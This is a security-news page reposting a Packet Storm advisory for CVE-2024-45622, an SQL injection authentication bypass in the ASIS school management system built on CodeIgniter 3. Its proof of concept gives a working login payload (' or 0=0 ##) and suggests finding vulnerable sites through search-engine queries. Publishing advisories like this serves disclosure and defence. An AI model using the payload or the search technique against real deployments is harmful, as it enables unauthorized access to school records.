Security
Headlines
HeadlinesLatestCVEs

Headline

ASIS 3.2.0 SQL Injection

Aplikasi Sistem Sekolah using CodeIgniter 3 versions 3.0.0 through 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
#sql#vulnerability#windows#google#git#auth#chrome
============================================================================================================================================| # Title     : ASIS | Aplikasi Sistem Sekolah using CodeIgniter 3 - SQL Injection Authentication Bypass                                   || # Author    : checkgue                                                                                                                   || # Tested on : windows 10 (Home) / Browser : Google Chrome 128.0.6613.114 (Official Build) (64-bit)                                       || # Vendor    : https://www.facebook.com/groups/181558652941070/                                                                           |============================================================================================================================================poc :[+] Dorking İn Google or Other Search Enggine. "ASIS | Aplikasi Sistem Sekolah"[+] Use payload : user & pass = ' or 0=0 ##[+] Panel : http://localhost/asispanel/CVE: CVE-2024-45622References:https://aegislens.com/home/cve-2024-45622/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45622https://www.cve.org/CVERecord?id=CVE-2024-45622https://nvd.nist.gov/vuln/detail/CVE-2024-45622https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.mdhttps://github.com/advisories/GHSA-8hxv-6g4p-2w59Greetings to : =====Meta4sec * Bungker |====================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution